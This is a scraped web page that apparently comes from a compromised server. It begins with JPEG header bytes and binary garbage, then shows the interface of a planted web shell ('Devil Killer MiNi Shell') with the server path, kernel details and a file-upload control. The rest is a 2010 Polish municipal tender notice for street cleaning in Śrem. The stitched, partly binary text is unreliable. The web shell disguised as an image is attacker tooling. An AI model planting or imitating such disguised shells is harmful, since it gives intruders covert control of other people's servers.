JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/81807-N-2010.html

<p class="kh_header"><b>Śrem: Utrzymanie czystości i porządku dróg gminnych, wewnętrznych 
i innych będących w zarządzie gminy Śrem</b><br>
<b>Numer ogłoszenia: 81807 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w  Śremie , pl. 20 Października 1, 63-100 Śrem, woj. wielkopolskie, tel. (061) 2835225 w. 104, faks 061 2835337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srem.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.srem.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i porządku dróg gminnych, wewnętrznych 
i innych będących w zarządzie gminy Śrem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie zadania - utrzymanie czystości 
i porządku dróg gminnych, wewnętrznych i innych będących w zarządzie gminy Śrem. 
4.1. Zakres rzeczowy robót:
a)	całoroczne, mechaniczne zamiatanie ulic przy użyciu zamiatarki ulicznej na podwoziu samochodu ciężarowego z funkcją polewania ulic, przy czym zamiatanie i porządkowanie następujących ulic: Piłsudskiego, Kilińskiego, Staszica, Gostyńskiej, Sikorskiego, Chłapowskiego, Zamenhofa, 1 Maja, Mickiewicza, Pl. 20 Października ma odbywać się w godzinach wieczornych;
b)	oczyszczanie krawężników i chodników należących do pasa drogowego;
c)	uporządkowanie dróg gminnych, wewnętrznych i innych będących 
w zarządzie gminy Śrem po akcji zima do dnia 31 marca 
2011 r. (wywóz piasku i innych zanieczyszczeń powstałych 
na skutek przeprowadzonej akcji zima);
d)	całoroczne opróżnianie koszy ulicznych (zgodnie z zasadami określonymi w Regulaminie utrzymania czystości i porządku 
na terenie gminy Śrem), utrzymywanie czystości wokół nich, 
jak również estetycznego ich wyglądu, mycie i dezynfekcja, dokonywanie napraw i remontów uszkodzonych koszy, wymiana uszkodzonych koszy/montaż nowych koszy;
e)	usuwanie plakatów, ulotek, ogłoszeń umieszczanych nielegalnie 
na obiektach infrastruktury miejskiej, w szczególności: słupach oświetleniowych, znakach drogowych, słupach sygnalizacji świetlnej, koszach, szafkach energetycznych  itp. znajdujących się na terenach przeznaczonych do sprzątania;
f)	oczyszczanie wszystkich słupów ogłoszeniowych na terenie miasta Śrem z ogłoszeń (do czystego podkładu) w terminie 15 i 30 każdego miesiąca. Jeśli dni te przypadają w niedziele lub święta to 
w następnym dniu roboczym po tych dniach. Utrzymanie porządku 
i czystości terenu w promieniu 4 m od słupa;
g)	usuwanie padliny leżącej na jezdni oraz przetrzymanie jej  do czasu przyjazdu odpowiednich służb, po uprzednim zgłoszeniu tego faktu przez Urząd Miejski w Śremie;
h)	wywóz nieczystości powstałych w trakcie wykonywania prac 
na składowisko odpadów, oraz ewidencjonowanie wywożonych nieczystości;
i)	wywóz nieczystości z terenu gminy Śrem powstałych w trakcie wykonywania prac przez osadzonych w Areszcie śledczym oraz osoby pracujące w ramach prac społeczno użytecznych w okresie 
od 1 maja do 31 października 2010 r. po uprzednim zgłoszeniu przez Zamawiającego;
j)	usuwanie zanieczyszczeń powstałych na skutek kolizji drogowych lub zdarzeń losowych;
k)	mycie balustrad na Moście 23 Stycznia (tj. 2 x 283,6 mb) oraz balustrad przy zejściu z mostu (4 x 18,7 mb) 4 razy w roku - pierwsze mycie tydzień przed Świętami Wielkanocnymi, drugie mycie w pierwszym tygodniu czerwca (przed Dniami Śremu 
i Świętem Bożego Ciała), trzecie mycie do końca września i czwarte mycie do końca listopada 2010 r.;
l)	oczyszczenie i odmalowanie w istniejącej kolorystyce, a także wcześniejsza naprawa uszkodzonych oraz uzupełnienie brakujących elementów barier ochronnych, oporęczowania łańcuchowego 
i rurowego 1 raz w roku na wiosnę w terminie do 31 maja 2010 r. Barierki objęte naprawą, czyszczeniem i malowaniem wyszczególnione są w załączniku nr 5 do SIWZ (malowanie nie dotyczy barier ochronnych oznaczonych numerami: 3, 4, 5, 8, 9, 12, 20, 25, 27, wymienionych w załączniku nr 5 do SIWZ);
m)	oczyszczenie i odmalowanie balustrad wraz z wcześniejszą, ewentualną naprawą uszkodzonych znajdujących się na moście 
na Kanale Ulgi (tj. 2 x 204 mb) 1 raz w roku na wiosnę - do końca maja 2010 r.;
n)	polewanie ulic w okresie letnim 2 razy dziennie (między godziną 1100-1200 i 1500-1600), gdy temperatura powietrza przez kolejne trzy dni wynosić będzie powyżej 30oC;
o)	wywieszanie flag masztowych (unijnej, narodowej i miejskiej) 
na masztach znajdujących się na Placu 20 Października w Śremie (pranie i prasowanie flag wg potrzeb, jednak nie rzadziej niż jeden raz w tygodniu);
p)	flagowanie miasta na każdą uroczystość miejską i narodową 
(min. 10 razy w roku);
q)	stała obsługa wszystkich imprez odbywających się na Placu 
20 Października tj. m.in. rozstawienie dodatkowych koszy na śmieci oraz ich opróżnianie i bieżące sprzątanie w trakcie imprezy, sprzątanie po zakończeniu imprezy oraz koszty wywozu nieczystości stałych; 

Wykaz terenów wraz z określoną częstotliwością sprzątania określa załącznik nr 4 do SIWZ.

4.2. Materiały niezbędne do wykonania zadania zabezpiecza wykonawca, których wartość należy wkalkulować w ofercie przetargowej. 

4.3. W oferowanej cenie należy również uwzględnić wszelkie czynności 
i koszty wynikające z technologii robót, związane z realizacją zadania, 
a niewymienione w specyfikacji (m.in. zakup niezbędnego sprzętu, wywóz odpadów na składowisko, ubezpieczenie OC wykonywanej działalności)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.91.40.00-7, 90.51.32.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany 
do wniesienia wadium do dnia 20 kwietnia 2010 r. do godz. 800 w wysokości 5.000,00 zł (słownie: pięć tysięcy złotych 00/100). 
Wadium należy wnieść w pieniądzu na konto Urzędu Miejskiego w Śremie:
SBL Śrem 29 1610 1188 0013 0521 2000 0004

Zamawiający dopuszcza również wniesienie wadium w formach wskazanych 
w art. 45 ust. 6 Prawa zamówień publicznych. Oryginał dowodu wniesienia wadium w formie innej niż pieniężna należy złożyć w Pionie Zarządzania Finansami Gminy, pok. nr 9 do dnia 20 kwietnia 2010 r. godz. 745, 
a potwierdzoną kopię należy załączyć do oferty lub dostarczyć przed otwarciem ofert.

Oferta, która nie będzie zabezpieczona akceptowaną formą wadium zostanie przez Zamawiającego odrzucona a Wykonawca wykluczony 
z udziału w postępowaniu.

Zwrot oraz zatrzymanie wadium następuje zgodnie z art. 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>13.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 Prawa zamówień publicznych, dotyczące:
1)	posiadania uprawnień do wykonywania określonej działalności 
lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień;
2)	posiadania niezbędnej wiedzy i doświadczenia do wykonania zamówienia, tj. wykażą, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie, co najmniej 2 zadania odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, o wartości każdej z robót, równej, co najmniej 100 000,00 zł, z podaniem ich wartości oraz daty 
i miejsca wykonania robót wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. Zakazuje się wykonywania zamówienia przez podwykonawców;
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. zatrudnienie na stałe min. 
5 osób oraz posiadanie min. 1 zamiatarki ulicznej;
4)	sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tzn. że posiadają na koncie kwotę nie mniejszą 
niż 100.000,00 zł (może być wyciąg bankowy) lub posiadają zdolność kredytową w takiej wysokości;
5)	posiadania polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
na kwotę co najmniej 100.000,00 zł.

13.2. Z postępowania  o udzielenie zamówienia wyklucza się wykonawców zgodnie z art. 24 Prawa zamówień publicznych.

13.3. Ocena spełniania warunków udziału w postępowaniu oraz 
nie podlegania wykluczeniu z udziału w postępowaniu, zostanie dokonana 
w oparciu o oświadczenia wykonawcy o spełnianiu warunków podmiotowych udziału w postępowaniu oraz dokumenty potwierdzające spełnianie 
tych warunków.
Ocena spełniania warunków zostanie dokonana według formuły 
spełnia / nie spełnia na podstawie załączonych dokumentów.

14. W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca dołącza do oferty następujące dokumenty i oświadczenia:

14.1. Formularz ofertowy - Załącznik nr 1.

14.2. Oświadczenia (Załącznik nr 2), że Wykonawca:
1)	posiada uprawnienia do wykonywania określonej działalności 
lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiada niezbędną wiedzę i oświadczenie oraz potencjał techniczny, 
a także dysponuje osobami zdolnymi do wykonania zamówienia;
3)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlega wykluczeniu z postępowania na podstawie art. 24 Prawa zamówień publicznych;
5)	uważa się za związanego z ofertą w ciągu okresu jej ważności określonej w pkt 17 niniejszej specyfikacji, że zobowiązuje się, jeżeli jego oferta zostanie uznana za najkorzystniejszą, do zawarcia umowy  w terminie związania z ofertą za cenę proponowaną w ofercie, 
wg wzoru umowy stanowiącego Załącznik Nr 3 do SIWZ.

14.3. Odpis z właściwego rejestru lub zaświadczenie z ewidencji działalności gospodarczej potwierdzające, że działalność prowadzona przez Wykonawcę odpowiada przedmiotowi zamówienia, wystawiony nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert.

14.4. Aktualne zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek 
na ubezpieczenie społeczne lub zdrowotne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

14.5. Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat
lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymaniu w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 
3 miesiące przed upływem terminu składania ofert.

14.6. Aktualne zaświadczenie z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 9 Prawa zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

14.7. Informację z banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Z dokumentu musi wynikać, że Wykonawca posiada na koncie kwotę 
nie mniejszą niż 100.000,00 zł (może być wyciąg bankowy) lub posiada zdolność kredytową w takiej wysokości.

14.8. Kserokopię aktualnej polisy ubezpieczeniowej potwierdzającej, 
że Wykonawca jest ubezpieczony w zakresie odpowiedzialności cywilnej prowadzonej działalności gospodarczej na kwotę co najmniej 100.000,00 zł.
 
14.9. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych,
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, 
a także do zakresu wykonywanych przez nich czynności. Zakazuje się wykonywania zamówienia przez podwykonawców.

14.10. Wykaz sprzętu technicznego przewidywanego do wykonania zamówienia (własny lub do dyspozycji na podstawie umowy 
najmu, dzierżawy lub innej oddającej sprzęt do dyspozycji), tj. min. 
1 zamiatarkę.
Oznacza to, że Wykonawca musi przedłożyć dokumenty, z których 
wynika tytuł prawny do sprzętu.

14.11. Wykaz wykonanych w ostatnich trzech latach min. dwóch podobnych, co do zakresu i wielkości zadań, z podaniem ich wartości oraz daty i miejsca wykonania robót wraz z załączeniem dokumentów potwierdzających, 
że roboty te zostały wykonane należycie. Oznacza to, że Wykonawca musi przedłożyć dokumenty potwierdzające należyte wykonanie wykazanych robót.

14.12. Dowód wpłacenia (złożenia) wadium należy załączyć do oferty 
lub dostarczyć Komisji Przetargowej przed otwarciem ofert.

14.13. Wykonawca akceptuje wzór umowy poprzez jego podpisanie 
na ostatniej stronie w miejscu przeznaczonym na podpis Wykonawcy 
oraz dołącza do sporządzonej oferty. Niepodpisanie wzoru umowy skutkować będzie odrzuceniem oferty.

14.14. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania 
poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 14.3., 14.4., 14.5., i 14.6. niniejszej specyfikacji, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę 
lub miejsce zamieszkania, potwierdzające odpowiednio, że:
	1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
	3)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 
lub wstrzymanie w całości wykonania decyzji właściwego organu.

14.15. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 14.3., 14.4., 14.5., i 14.6. zastępuje się je zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca 
ma siedzibę lub miejsce zamieszkania. 

14.16.. Do terminów wystawienia dokumentów, o których mowa w pkt 14.14 
i 14.15. stosuje się odpowiednio terminy o których mowa w pkt 14.3., 14.4., 14.5. i 14.6. 

Składane dokumenty muszą zachować aktualność oraz być zgodne 
z rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009 r.
w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane 
/Dz.U. z 2009 r. Nr 226 poz.1817/</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

